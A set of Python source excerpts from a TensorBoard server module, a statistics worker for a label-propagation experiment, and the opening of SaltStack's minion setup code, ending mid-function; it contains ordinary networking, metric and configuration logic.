if not host:
# Without an explicit host, we default to serving on all interfaces,
# and will attempt to serve both IPv4 and IPv6 traffic through one socket.
host = self._get_wildcard_address(flags.port)
self._auto_wildcard = True
try:
super(WerkzeugServer, self).__init__(host, flags.port, wsgi_app)
except socket.error as e:
if hasattr(errno, 'EACCES') and e.errno == errno.EACCES:
raise TensorBoardServerException(
'TensorBoard must be run as superuser to bind to port %d' %
flags.port)
elif hasattr(errno, 'EADDRINUSE') and e.errno == errno.EADDRINUSE:
if flags.port == 0:
raise TensorBoardServerException(
'TensorBoard unable to find any open port')
else:
raise TensorBoardServerException(
'TensorBoard could not bind to port %d, it was already in use' %
flags.port)
elif hasattr(errno, 'EADDRNOTAVAIL') and e.errno == errno.EADDRNOTAVAIL:
raise TensorBoardServerException(
'TensorBoard could not bind to unavailable address %s' % host)
elif hasattr(errno, 'EAFNOSUPPORT') and e.errno == errno.EAFNOSUPPORT:
raise TensorBoardServerException(
'Tensorboard could not bind to unsupported address family %s' %
host)
# Raise the raw exception if it wasn't identifiable as a user error.
raise
def _get_wildcard_address(self, port):
"""Returns a wildcard address for the port in question.
This will attempt to follow the best practice of calling getaddrinfo() with
a null host and AI_PASSIVE to request a server-side socket wildcard address.
If that succeeds, this returns the first IPv6 address found, or if none,
then returns the first IPv4 address. If that fails, then this returns the
hardcoded address "::" if socket.has_ipv6 is True, else "0.0.0.0".
"""
fallback_address = '::' if socket.has_ipv6 else '0.0.0.0'
if hasattr(socket, 'AI_PASSIVE'):
try:
addrinfos = socket.getaddrinfo(None, port, socket.AF_UNSPEC,
socket.SOCK_STREAM, socket.IPPROTO_TCP,
socket.AI_PASSIVE)
except socket.gaierror as e:
logger.warn('Failed to auto-detect wildcard address, assuming %s: %s',
fallback_address, str(e))
return fallback_address
addrs_by_family = defaultdict(list)
for family, _, _, _, sockaddr in addrinfos:
# Format of the "sockaddr" socket address varies by address family,
# but [0] is always the IP address portion.
addrs_by_family[family].append(sockaddr[0])
if hasattr(socket, 'AF_INET6') and addrs_by_family[socket.AF_INET6]:
return addrs_by_family[socket.AF_INET6][0]
if hasattr(socket, 'AF_INET') and addrs_by_family[socket.AF_INET]:
return addrs_by_family[socket.AF_INET][0]
logger.warn('Failed to auto-detect wildcard address, assuming %s',
fallback_address)
return fallback_address
def server_bind(self):
"""Override to enable IPV4 mapping for IPV6 sockets when desired.
The main use case for this is so that when no host is specified, TensorBoard
can listen on all interfaces for both IPv4 and IPv6 connections, rather than
having to choose v4 or v6 and hope the browser didn't choose the other one.
"""
socket_is_v6 = (
hasattr(socket, 'AF_INET6') and self.socket.family == socket.AF_INET6)
has_v6only_option = (
hasattr(socket, 'IPPROTO_IPV6') and hasattr(socket, 'IPV6_V6ONLY'))
if self._auto_wildcard and socket_is_v6 and has_v6only_option:
try:
self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 0)
except socket.error as e:
# Log a warning on failure to dual-bind, except for EAFNOSUPPORT
# since that's expected if IPv4 isn't supported at all (IPv6-only).
if hasattr(errno, 'EAFNOSUPPORT') and e.errno != errno.EAFNOSUPPORT:
logging.warn('Failed to dual-bind to IPv4 wildcard: %s', str(e))
super(WerkzeugServer, self).server_bind()
def handle_error(self, request, client_address):
"""Override to get rid of noisy EPIPE errors."""
del request # unused
# Kludge to override a SocketServer.py method so we can get rid of noisy
# EPIPE errors. They're kind of a red herring as far as errors go. For
# example, `curl -N http://localhost:6006/ | head` will cause an EPIPE.
exc_info = sys.exc_info()
e = exc_info[1]
if isinstance(e, IOError) and e.errno == errno.EPIPE:
logger.warn('EPIPE caused by %s in HTTP serving' % str(client_address))
else:
logger.error('HTTP serving error', exc_info=exc_info)
def get_url(self):
if self._auto_wildcard:
display_host = socket.gethostname()
else:
host = self._flags.host
display_host = (
'[%s]' % host if ':' in host and not host.startswith('[') else host)
return 'http://%s:%d%s' % (display_host, self.server_port,
self._flags.path_prefix)
|
stats.py | import numpy as np
import os
import shelve
import sklearn.preprocessing as prep
from datetime import datetime
from threading import Thread
from enum import Enum
from queue import Queue
from ilp.constants import EPS_32, EPS_64, STATS_DIR
from ilp.helpers.log import make_logger
STATS_FILE_EXT = '.stat'
class JobType(Enum):
EVAL = 1
ONLINE_ITER = 3
PRINT_STATS = 6
LABEL_STREAM = 9
TRAIN_PRED = 11
TEST_PRED = 12
RUNTIME = 13
POINT_PREDICTION = 14
logger = make_logger(__name__)
class StatisticsWorker:
"""
Parameters
----------
config : dict
Dictionary with configuration key-value pairs of the running experiment.
path : str, optional
File path to save the aggregated statistics (default=None).
isave : int, optional
The frequency of saving statistics (default=1000).
Attributes
----------
_stats : Statistics
Class to store different kinds of statistics during an experiment run.
_jobs : Queue
Queue of jobs to process in a different thread.
_thread : Thread
Thread in which to process incoming jobs.
"""
def __init__(self, config, path=None, isave=1):
if path is None:
cur_time = datetime.now().strftime('%d%m%Y-%H%M%S')
dataset_name = config['dataset']['name']
filename = 'stats_' + cur_time + '_' + str(dataset_name) + STATS_FILE_EXT
path = os.path.join(STATS_DIR, filename)
elif not path.endswith(STATS_FILE_EXT):
path = path + STATS_FILE_EXT
os.makedirs(os.path.split(path)[0], exist_ok=True)
self.path = path
self.config = config
self.isave = isave
self._stats = Statistics()
self._jobs = Queue()
self._thread = Thread(target=self.work)
def start(self):
self.n_iter_eval = 0
self._thread.start()
def save(self):
prev_file = self.path + '_iter_' + str(self.n_iter_eval)
if os.path.exists(self.path):
os.rename(self.path, prev_file)
with shelve.open(self.path, 'c') as shelf:
shelf['stats'] = self._stats.__dict__
shelf['config'] = self.config
if os.path.exists(prev_file):
os.remove(prev_file)
def stop(self):
self._jobs.put_nowait({'job_type': JobType.PRINT_STATS})
self._jobs.put(None)
self._thread.join()
self.save()
def send(self, d):
self._jobs.put_nowait(d)
def work(self):
while True:
job = self._jobs.get()
if job is None: # End of algorithm
self._jobs.task_done()
break
job_type = job['job_type']
if job_type == JobType.EVAL:
self._stats.evaluate(job['y_est'], job['y_true'])
self.n_iter_eval += 1
elif job_type == JobType.LABEL_STREAM:
self._stats.label_stream_true = job['y_true']
self._stats.label_stream_mask_observed = job['mask_obs']
elif job_type == JobType.POINT_PREDICTION:
f = job['vec']
h = self._stats.entropy(f)
self._stats.entropy_point_after.append(h)
y = job['y']
self._stats.pred_point_after.append(y)
self._stats.conf_point_after.append(f.max())
elif job_type == JobType.ONLINE_ITER:
self._stats.iter_online_count.append(job['n_in_iter'])
self._stats.iter_online_duration.append(job['dt'])
elif job_type == JobType.PRINT_STATS:
err = self._stats.clf_error_mixed[-1] * 100
logger.info('Classif. Error: {:5.2f}%\n\n'.format(err))
elif job_type == JobType.TRAIN_PRED:
self._stats.train_est = job['y_est']
elif job_type == JobType.TEST_PRED:
y_pred_knn = job['y_pred_knn']
self._stats.test_pred_knn.append(y_pred_knn)
y_pred_lp = job['y_pred_lp']
self._stats.test_pred_lp.append(y_pred_lp)
self._stats.test_true = y_test = job['y_true']
err_knn = np.mean(np.not_equal(y_pred_knn, y_test))
err_lp = np.mean(np.not_equal(y_pred_lp, y_test))
logger.info('knn test err: {:5.2f}%'.format(err_knn*100))
logger.info('ILP test err: {:5.2f}%'.format(err_lp*100))
self._stats.test_error_knn.append(err_knn)
self._stats.test_error_ilp.append(err_lp)
elif job_type == JobType.RUNTIME:
self._stats.runtime = job['t']
if self.n_iter_eval % self.isave == 0:
self.save()
self._jobs.task_done()
EXCLUDED_METRICS = {'label_stream_true',
'label_stream_mask_observed',
'n_burn_in',
'test_pred_knn', 'test_pred_lp', 'test_true',
'train_est', 'runtime',
'conf_point_after', 'test_error_knn', 'test_error_ilp'}
class Statistics:
"""
Statistics gathered during learning (training and testing).
"""
def __init__(self):
self.iter_online_count = []
self.iter_online_duration = []
# Evaluation after a new point arrives
self.n_invalid_samples = []
self.invalid_samples_ratio = []
self.clf_error_mixed = []
self.clf_error_valid = []
self.l1_error_mixed = []
self.l1_error_valid = []
self.cross_ent_mixed = []
self.cross_ent_valid = []
self.entropy_pred_mixed = []
self.entropy_pred_valid = []
# Defined once
self.label_stream_true = []
self.label_stream_mask_observed = []
self.test_pred_knn = []
self.test_pred_lp = []
self.test_true = []
self.train_est = []
self.runtime = np.nan
self.test_error_ilp = []
self.test_error_knn = []
self.entropy_point_after = []
self.pred_point_after = []
self.conf_point_after = []
def evaluate(self, y_predictions, y_true):
"""Computes statistics for a given set of predictions and the ground truth.
Args:
y_predictions (array_like): [u_samples, n_classes] soft class predictions for current unlabeled samples
y_true (array_like): [u_samples, n_classes] one-hot encoding of the true classes_ of the unlabeled samples
eps (float): quantity slightly larger than zero to avoid division by zero
Returns:
float, average accuracy
"""
u_samples, n_classes = y_predictions.shape
# Clip predictions to [0,1]
eps = EPS_32 if y_predictions.itemsize == 4 else EPS_64
y_pred_01 = np.clip(y_predictions, eps, 1-eps)
# Normalize predictions to make them proper distributions
y_pred = prep.normalize(y_pred_01, copy=False, norm='l1')
# 0-1 Classification error under valid and invalid points
y_pred_max = np.argmax(y_pred, axis=1)
y_true_max = np.argmax(y_true, axis=1)
fc_err_mixed = self.zero_one_loss(y_pred_max, y_true_max)
self.clf_error_mixed.append(fc_err_mixed)
# L1 error under valid and invalid points
l1_err_mixed = np.mean(self.l1_error(y_pred, y_true))
self.l1_error_mixed.append(l1_err_mixed)
# Cross-entropy loss
crossent_mixed = np.mean(self.cross_entropy(y_true, y_pred))
self.cross_ent_mixed.append(crossent_mixed)
# Identify valid points (for which a label has been estimated)
ind_valid, = np.where(y_pred.sum(axis=1) != 0)
n_valid = len(ind_valid)
n_invalid = u_samples - n_valid
self.n_invalid_samples.append(n_invalid)
self.invalid_samples_ratio.append(n_invalid / u_samples)
# Entropy of the predictions
if n_invalid == 0:
entropy_pred_mixed = np.mean(self.entropy(y_pred))
self.entropy_pred_mixed.append(entropy_pred_mixed)
return
y_pred_valid = y_pred[ind_valid]
y_true_valid = y_true[ind_valid]
# 0-1 Classification error under valid points only
y_pred_valid_max = y_pred_max[ind_valid]
y_true_valid_max = y_true_max[ind_valid]
err_valid_max = self.zero_one_loss(y_pred_valid_max, y_true_valid_max)
self.clf_error_valid.append(err_valid_max)
# L1 error under valid points only
l1_err_valid = np.mean(self.l1_error(y_pred_valid, y_true_valid))
self.l1_error_valid.append(l1_err_valid)
# Cross-entropy loss
ce_valid = np.mean(self.cross_entropy(y_true_valid, y_pred_valid))
self.cross_ent_valid.append(ce_valid)
# Entropy of the predictions
entropy_pred_valid = np.mean(self.entropy(y_pred_valid))
self.entropy_pred_valid.append(entropy_pred_valid)
n_total = n_valid + n_invalid
entropy_pred_mixed = (entropy_pred_valid*n_valid + n_invalid) / n_total
self.entropy_pred_mixed.append(entropy_pred_mixed)
@staticmethod
def zero_one_loss(y_pred, y_true, average=True):
"""
Args:
y_pred (array_like): (n_samples, n_classes)
y_true (array_like): (n_samples, n_classes)
average (bool): Whether to take the average over all predictions.
Returns: The absolute difference for each row.
Note that this will be in [0,2] for p.d.f.s.
"""
if average:
return np.mean(np.not_equal(y_pred, y_true))
else:
return np.sum(np.not_equal(y_pred, y_true))
@staticmethod
def l1_error(y_pred, y_true, norm=True):
"""
Args:
y_pred (array_like): An array of probability distributions (usually predictions) with shape (n_distros, n_classes)
y_true (array_like): An array of probability distributions (usually groundtruth) with shape (n_distros, n_classes)
norm (bool): Whether to constrain the L1 error to be in [0,1].
Returns: The absolute difference for each row. Note that this will be in [0,2] for pdfs.
"""
l1_error = np.abs(y_pred - y_true).sum(axis=1)
if norm:
l1_error /= 2
return l1_error
@staticmethod
def entropy(p, norm=True):
"""
Args:
p (array_like): An array of probability distributions with shape (n_distros, n_classes)
norm (bool): Whether to normalize the entropy to constrain it in [0,1]
Returns: An array of entropies of the distributions with shape (n_distros,)
"""
entropy = - (p * np.log(p)).sum(axis=1)
if norm:
entropy /= np.log(p.shape[1])
return entropy
@staticmethod
def cross_entropy(p, q, norm=True):
"""
Args:
p (array_like): An array of probability distributions (usually groundtruth) with shape (n_distros, n_classes)
q (array_like): An array of probability distributions (usually predictions) with shape (n_distros, n_classes)
norm (bool): Whether to normalize the entropy to constrain it in [0,1]
Returns: An array of cross entropies between the groundtruth and the prediction with shape (n_distros,)
"""
cross_ent = -(p * np.log(q)).sum(axis=1)
if norm:
cross_ent /= np.log(p.shape[1])
return cross_ent
def aggregate_statistics(stats_path, metrics=None, excluded_metrics=None):
print('Aggregating statistics from {}'.format(stats_path))
if stats_path.endswith(STATS_FILE_EXT):
list_of_files = [stats_path]
else:
list_of_files = [os.path.join(stats_path, f) for f in os.listdir(
stats_path) if f.endswith(STATS_FILE_EXT)]
stats_runs = []
random_states = []
for stats_file in list_of_files:
with shelve.open(stats_file, 'r') as f:
stats_runs.append(f['stats'])
random_states.append(f['config']['options']['random_state'])
print('\nRandom seeds used: {}\n'.format(random_states))
if metrics is None:
metrics = Statistics().__dict__.keys()
if excluded_metrics is None:
excluded_metrics = EXCLUDED_METRICS
stats_mean, stats_std = {}, {}
stats_run0 = stats_runs[0]
for metric in metrics:
if metric in excluded_metrics: continue
if metric not in stats_run0:
print('\nMetric {} not found!'.format(metric))
continue
metric_lists = [stats[metric] for stats in stats_runs]
# Make a numpy 2D array to merge the different runs
metric_runs = np.asarray(metric_lists)
s = metric_runs.shape
if len(s) < 2:
print('No values for metric, skipping.')
continue
stats_mean[metric] = np.mean(metric_runs, axis=0)
stats_std[metric] = np.std(metric_runs, axis=0)
with shelve.open(list_of_files[0], 'r') as f:
config = f['config']
lp_times = stats_mean['iter_online_duration']
ice = stats_mean['clf_error_mixed'][0] * 100
fce = stats_mean['clf_error_mixed'][-1] * 100
print('Avg. LP time/iter: {:.4f}s'.format(np.mean(lp_times)))
print('Initial classification error: {:.2f}%'.format(ice))
print('Final classification error: {:.2f}%'.format(fce))
# Add excluded metrics in the end
for stats_run in stats_runs:
for ex_metric in excluded_metrics:
if ex_metric in stats_run:
print('Appending excluded metric: {}'.format(ex_metric))
stats_mean[ex_metric] = stats_run[ex_metric]
if len(list_of_files) == 1:
stats_std = None
return stats_mean, stats_std, config
|
minion.py | # -*- coding: utf-8 -*-
'''
Routines to set up a minion
'''
# Import python libs
from __future__ import absolute_import, print_function, with_statement, unicode_literals
import functools
import os
import sys
import copy
import time
import types
import signal
import random
import logging
import threading
import traceback
import contextlib
import multiprocessing
from random import randint, shuffle
from stat import S_IMODE
import salt.serializers.msgpack
from binascii import crc32
# Import Salt Libs
# pylint: disable=import-error,no-name-in-module,redefined-builtin
from salt.ext import six
from salt._compat import ipaddress
from salt.utils.network import parse_host_port
from salt.ext.six.moves import range
from salt.utils.zeromq import zmq, ZMQDefaultLoop, install_zmq, ZMQ_VERSION_INFO
import salt.transport.client
import salt.defaults.exitcodes
from salt.utils.ctx import RequestContext
# pylint: enable=no-name-in-module,redefined-builtin
import tornado
HAS_PSUTIL = False
try:
import salt.utils.psutil_compat as psutil
HAS_PSUTIL = True
except ImportError:
pass
HAS_RESOURCE = False
try:
import resource
HAS_RESOURCE = True
except ImportError:
pass
try:
import zmq.utils.monitor
HAS_ZMQ_MONITOR = True
except ImportError:
HAS_ZMQ_MONITOR = False
try:
import salt.utils.win_functions
HAS_WIN_FUNCTIONS = True
except ImportError:
HAS_WIN_FUNCTIONS = False
# pylint: enable=import-error
# Import salt libs
import salt
import salt.client
import salt.crypt
import salt.loader
import salt.beacons
import salt.engines
import salt.payload
import salt.pillar
import salt.syspaths
import salt.utils.args
import salt.utils.context
import salt.utils.data
import salt.utils.error
import salt.utils.event
import salt.utils.files
import salt.utils.jid
import salt.utils.minion
import salt.utils.minions
import salt.utils.network
import salt.utils.platform
import salt.utils.process
import salt.utils.schedule
import salt.utils.ssdp
import salt.utils.user
import salt.utils.zeromq
import salt.defaults.events
import salt.defaults.exitcodes
import salt.cli.daemons
import salt.log.setup
import salt.utils.dictupdate
from salt.config import DEFAULT_MINION_OPTS
from salt.defaults import DEFAULT_TARGET_DELIM
from salt.utils.debug import enable_sigusr1_handler
from salt.utils.event import tagify
from salt.utils.odict import OrderedDict
from salt.utils.process import (default_signals,
SignalHandlingMultiprocessingProcess,
ProcessManager)
from salt.exceptions import (
CommandExecutionError,
CommandNotFoundError,
SaltInvocationError,
SaltReqTimeoutError,
SaltClientError,
SaltSystemExit,
SaltDaemonNotRunning,
SaltException,
SaltMasterUnresolvableError
)
import tornado.gen # pylint: disable=F0401
import tornado.ioloop # pylint: disable=F0401
log = logging.getLogger(__name__)
# To set up a minion:
# 1. Read in the configuration
# 2. Generate the function mapping dict
# 3. Authenticate with the master
# 4. Store the AES key
# 5. Connect to the publisher
# 6. Handle publications
def resolve_dns(opts, fallback=True):
'''
Resolves the master_ip and master_uri options
'''
ret = {}
check_dns = True
if (opts.get('file_client', 'remote') == 'local' and
not opts.get('use_master_when_local', False)):
check_dns = False
# Since salt.log is imported below, salt.utils.network needs to be imported here as well
import salt.utils.network
if check_dns is True:
try:
if opts['master'] == '':
raise SaltSystemExit
ret['master_ip'] = salt.utils.network.dns_check(
opts['master'],
int(opts['master_port']),
True,
opts['ipv6'],
attempt_connect=False)
except SaltClientError:
retry_dns_count = opts.get('retry_dns_count', None)
if opts['retry_dns']:
while True:
if retry_dns_count is not None:
if retry_dns_count == 0:
raise SaltMasterUnresolvableError
retry_dns_count -= 1
import salt.log
msg = ('Master hostname: \'{0}\' not found or not responsive. '
'Retrying in {1} seconds').format(opts['master'], opts['retry_dns'])
if salt.log.setup.is_console_configured():
log.error(msg)
else:
print('WARNING: {0}'.format(msg))
time.sleep(opts['retry_dns'])
try:
ret['master_ip'] = salt.utils.network.dns_check(
opts['master'],
int(opts['master_port']),
True,
opts['ipv6'],
attempt_connect=False)
break
except SaltClientError:
pass
else:
if fallback:
ret['master_ip'] = '127.0.0.1'
else:
raise
except SaltSystemExit:
unknown_str = 'unknown address'
master = opts.get('master', unknown_str)
if master == '':
master = unknown_str
if opts.get('__role') == 'syndic':
err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolveable address. ' \
'Set \'syndic_master\' value in minion config.'.format(master)
else:
err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolveable address. ' \
'Set \'master\' value in minion config.'.format(master)
log.error(err)
raise SaltSystemExit(code=42, msg=err)
else:
ret['master_ip'] = '127.0.0.1'
if 'master_ip' in ret and 'master_ip' in opts:
if ret['master_ip'] != opts['master_ip']:
log.warning(
'Master ip address changed from %s to %s',
opts['master_ip'], ret['master_ip']
)
if opts['source_interface_name']:
log.trace('Custom source interface required: %s', opts['source_interface_name'])
interfaces = salt.utils.network.interfaces()
log.trace('The following interfaces are available on this Minion:')
log.trace(interfaces)
if opts['source_interface_name'] in interfaces:
if interfaces[opts['source_interface_name']]['up']:
addrs = interfaces[opts['source_interface_name']]['inet'] if not opts['ipv6'] else\
interfaces[opts['source_interface_name']]['inet6']
ret['source_ip'] = addrs[0]['address']
log.debug('Using %s as source IP address', ret['source_ip'])
else:
log.warning('The interface %s is down so it cannot be used as source to connect to the Master',
opts['source_interface_name'])
else:
log.warning('%s is not a valid interface. Ignoring.', opts['source_interface_name'])
elif opts['source_address']:
ret['source_ip'] = salt.utils.network.dns_check(
opts['source_address'],
int(opts['source_ret_port']),
True,
opts['ipv6'],
attempt_connect=False)
log.debug('Using %s as source IP address', ret['source_ip'])
if opts['source_ret_port']:
ret['source_ret_port'] = int(opts['source_ret_port'])
log.debug('Using %d as source port for the ret server', ret['source_ret_port'])
if opts['source_publish_port']:
ret['source_publish_port'] = int(opts['source_publish_port'])
log.debug('Using %d as source port for the master pub', ret['source_publish_port'])
ret['master_uri'] = 'tcp://{ip}:{port}'.format(
ip=ret['master_ip'], port=opts['master_port'])
log.debug('Master URI: %s', ret['master_uri'])
return ret
def prep_ip_port(opts):
'''
parse host:port values from opts['master'] and return valid:
master: ip address or hostname as a string
master_port: (optional) master returner port as integer
e.g.:
- master: 'localhost:1234' -> {'master': 'localhost', 'master_port': 1234}
- master: '127.0.0.1:1234' -> {'master': '127.0.0.1', 'master_port' :1234}
- master: '[::1]:1234' -> {'master': '::1', 'master_port': 1234}
- master: 'fe80::a00:27ff:fedc:ba98' -> {'master': 'fe80::a00:27ff:fedc:ba98'}
'''
ret = {}
# Use given master IP if "ip_only" is set or if master_ip is an ipv6 address without
# a port specified. The is_ipv6 check returns False if brackets are used in the IP
# definition such as master: '[::1]:1234'.
if opts['master_uri_format'] == 'ip_only':
ret['master'] = ipaddress.ip_address(opts['master'])
else:
host, port = parse_host_port(opts['master'])
ret = {'master': host}
if port:
ret.update({'master_port': port})
return ret
def get_proc_dir(cachedir, **kwargs):
'''
Given the cache directory, return the directory that process data is
stored in, creating it if it doesn't exist.
The following optional Keyword Arguments are handled:
mode: which is anything os.makedir would accept as mode.
uid: the uid to set, if not set, or it is None or -1 no changes are
made. Same applies if the directory is already owned by this
uid. Must be int. Works only on unix/unix like systems.
gid: the gid to set, if not set, or it is None or -1 no changes are
made. Same applies if the directory is already owned by this
gid. Must be int. Works only on unix/unix like systems.
'''
fn_ = os.path.join(cachedir, 'proc')
mode = kwargs.pop('mode', None)
if mode is None:
mode = {}
else:
mode = {'mode': mode}
if not os.path.isdir(fn_):
# proc_dir is not present, create it with mode settings
os.makedirs(fn_, **mode)
d_stat = os.stat(fn_)
# if mode is not an empty dict then we have an explicit
# dir mode. So lets check if mode needs to be changed.
if mode:
mode_part = S_IMODE(d_stat.st_mode)
if mode_part != mode['mode']:
os.chmod(fn_, (d_stat.st_mode ^ mode_part) | mode['mode'])
if hasattr(os, 'chown'):
# only on unix/unix like systems
uid = kwargs.pop('uid', -1)
gid = kwargs.pop('gid', -1)
# if uid and gid are both -1 then go ahead with
# no changes at all
if (d_stat.st_uid != uid or d_stat.st_gid != gid) and \
[i for i in (uid, gid) if i != -1]:
os.chown(fn_, uid, gid)
return fn_
def load_args_and_kwargs(func, args, data=None, ignore_invalid=False):
'''
Detect the args and kwargs that need to be passed to a function call, and
check them against what was passed.
'''
argspec = salt.utils.args.get_function_argspec(func)
_args = []
_kwargs = {}
invalid_kwargs = []
for arg in args:
if isinstance(arg, dict) and arg.pop('__kwarg__', False) is True:
# if the arg is a dict with __kwarg__ == True, then its a kwarg
for key, val in six.iteritems(arg):
if argspec.keywords or key in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs[key] = val
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
invalid_kwargs.append('{0}={1}'.format(key, val))
continue
else:
string_kwarg = salt.utils.args.parse_input([arg], condition=False)[1] # pylint: disable=W0632
if string_kwarg:
if argspec.keywords or next(six.iterkeys(string_kwarg)) in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs.update(string_kwarg)
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
for key, val in six.iteritems(string_kwarg):
invalid_kwargs.append('{0}={1}'.format(key, val))
else:
_args.append(arg)
if invalid_kwargs and not ignore_invalid:
salt.utils.args.invalid_kwargs(invalid_kwargs)
if argspec.keywords and isinstance(data, dict):
# this function accepts **kwargs, pack in the publish data
for key, val in six.iteritems(data):
_kwargs['__pub_{0}'.format(key)] = val
return _args, _kwargs
def eval_master_func(opts):
'''
Evaluate master function if master type is 'func'
and save it result in opts['master']
'''
if '__master_func_evaluated' not in opts:
# split module and function and try loading the module
mod_fun = opts['master']
mod, fun = mod_fun.split('.')
try:
master_mod = salt.loader.raw_mod(opts, mod, fun)
if not master_mod:
raise KeyError
# we take whatever the module returns as master address
opts['master'] = master_mod[mod_fun]()
# Check for valid types
if not isinstance(opts['master'], (six.string_types, list)):
raise TypeError
opts['__master_func_evaluated'] = True
except KeyError:
log.error('Failed to load module %s', mod_fun)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
except TypeError:
log.error('%s returned from %s is not a string', opts['master'], mod_fun)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
log.info('Evaluated master from module: %s', mod_fun)
def master_event(type, master=None):
'''
Centralized master event function which will return event type based on event_map
'''
event_map = {'connected': '__master_connected',
'disconnected': '__master_disconnected',
'failback': '__master_failback',
'alive': '__master_alive'}
if type == 'alive' and master is not None:
return '{0}_{1}'.format(event_map.get(type), master)
return event_map.get(type, None)
def service_name():
'''
Return the proper service name based on platform
'''
return 'salt_minion' if 'bsd' in sys.platform else 'salt-minion'
class MinionBase(object):
def __init__(self, opts):
self.opts = opts
@staticmethod
def process_schedule(minion, loop_interval):
try:
if hasattr(minion, 'schedule'):
minion.schedule.eval()
else:
log.error('Minion scheduler not initialized. Scheduled jobs will not be run.')
return
# Check if scheduler requires lower loop interval than
# the loop_interval setting
if minion.schedule.loop_interval < loop_interval:
loop_interval = minion.schedule.loop_interval
log.debug(
'Overriding loop_interval because of scheduled jobs.'
)
except Exception as exc:
log.error('Exception %s occurred in scheduled job', exc)
return loop_interval
def process_beacons(self, functions):
'''
Evaluate all of the configured beacons, grab the config again in case
the pillar or grains changed
'''
if 'config.merge' in functions:
b_conf = functions['config.merge']('beacons', self.opts['beacons'], omit_opts=True)
if b_conf:
return self.beacons.process(b_conf, self.opts['grains']) # pylint: disable=no-member
return []
@tornado.gen.coroutine
def eval_master(self,
opts,
timeout=60,
safe=True,
failed=False,
failback=False):
'''
Evaluates and returns a tuple of the current master address and the pub_channel.
In standard mode, just creates a pub_channel with the given master address.
With master_type=func evaluates the current master address from the given
module and then creates a pub_channel.
With master_type=failover takes the list of masters and loops through them.
The first one that allows the minion to create a pub_channel is then
returned. If this function is called outside the minions initialization
phase (for example from the minions main event-loop when a master connection
loss was detected), 'failed' should be set to True. The current
(possibly failed) master will then be removed from the list of masters.
'''
# return early if we are not connecting to a master
if opts['master_type'] == 'disable':
log.warning('Master is set to disable, skipping connection')
self.connected = False
raise tornado.gen.Return((None, None))
# Run masters discovery over SSDP. This may modify the whole configuration,
# depending of the networking and sets of masters.
# if we are using multimaster, discovery can only happen at start time
# because MinionManager handles it. by eval_master time the minion doesn't
# know about other siblings currently running
if isinstance(self.opts['discovery'], dict) and not self.opts['discovery'].get('multimaster'):
self._discover_masters()
# check if master_type was altered from its default
if opts['master_type'] != 'str' and opts['__role'] != 'syndic':
# check for a valid keyword
if opts['master_type'] == 'func':
eval_master_func(opts)
# if failover or distributed is set, master has to be of type list
elif opts['master_type'] in ('failover', 'distributed'):
if isinstance(opts['master'], list):
log.info(
'Got list of available master addresses: %s',
opts['master']
)
if opts['master_type'] == 'distributed':
master_len = len(opts['master'])
if master_len > 1:
secondary_masters = opts['master'][1:]
master_idx = crc32(opts['id']) % master_len
try:
preferred_masters = opts['master']
preferred_masters[0] = opts['master'][master_idx]
preferred_masters[1:] = [m for m in opts['master'] if m != preferred_masters[0]]
opts['master'] = preferred_masters
log.info('Distributed to the master at \'%s\'.', opts['master'][0])
except (KeyError, AttributeError, TypeError):
log.warning('Failed to distribute to a specific master.')
else:
log.warning('master_type = distributed needs more than 1 master.')
if opts['master_shuffle']:
log.warning(
'Use of \'master_shuffle\' detected. \'master_shuffle\' is deprecated in favor '
'of \'random_master\'. Please update your minion config file.'
)
opts['random_master'] = opts['master_shuffle']
opts['auth_tries'] = 0
if opts['master_failback'] and opts['master_failback_interval'] == 0:
opts['master_failback_interval'] = opts['master_alive_interval']
# if opts['master'] is a str and we have never created opts['master_list']
elif isinstance(opts['master'], six.string_types) and ('master_list' not in opts):
# We have a string, but a list was what was intended. Convert.
# See issue 23611 for details
opts['master'] = [opts['master']]
elif opts['__role'] == 'syndic':
log.info('Syndic setting master_syndic to \'%s\'', opts['master'])
# if failed=True, the minion was previously connected
# we're probably called from the minions main-event-loop
# because a master connection loss was detected. remove
# the possibly failed master from the list of masters.
elif failed:
if failback:
# failback list of masters to original config
opts['master'] = opts['master_list']
else:
log.info(
'Moving possibly failed master %s to the end of '
'the list of masters', opts['master']
)
if opts['master'] in opts['local_masters']:
# create new list of master with the possibly failed
# one moved to the end
failed_master = opts['master']
opts['master'] = [x for x in opts['local_masters'] if opts['master'] != x]
opts['master'].append(failed_master)
else:
opts['master'] = opts['master_list']
else:
msg = ('master_type set to \'failover\' but \'master\' '
'is not of type list but of type '
'{0}'.format(type(opts['master'])))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# If failover is set, minion have to failover on DNS errors instead of retry DNS resolve.
# See issue 21082 for details
if opts['retry_dns'] and opts['master_type'] == 'failover':
msg = ('\'master_type\' set to \'failover\' but \'retry_dns\' is not 0. '
'Setting \'retry_dns\' to 0 to failover to the next master on DNS errors.')
log.critical(msg)
opts['retry_dns'] = 0
else:
msg = ('Invalid keyword \'{0}\' for variable '
'\'master_type\''.format(opts['master_type']))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# FIXME: if SMinion don't define io_loop, it can't switch master see #29088
# Specify kwargs for the channel factory so that SMinion doesn't need to define an io_loop
# (The channel factories will set a default if the kwarg isn't passed)
factory_kwargs = {'timeout': timeout, 'safe': safe}
if getattr(self, 'io_loop', None):
factory_kwargs['io_loop'] = self.io_loop # pylint: disable=no-member
tries = opts.get('master_tries', 1)
attempts = 0
# This sits outside of the connection loop below because it needs to set
# up a list of master URIs regardless of which masters are available
# to connect _to_. This is primarily used for masterless mode, when
# we need a list of master URIs to fire calls back to.
opts['master_uri_list'] = []
if 'master_list' not in opts:
if isinstance(opts['master'], list):
opts['master_list'] = copy.copy(opts['master'])
else:
opts['master_list'] = [opts['master']]
for master in opts['master_list']:
opts['master'] = master
opts.update(prep_ip_port(opts))
opts['master_uri_list'].append(resolve_dns(opts)['master_uri'])
# if we have a list of masters, loop through them and be
# happy with the first one that allows us to connect
if isinstance(opts['master'], list):
conn = False
last_exc = None
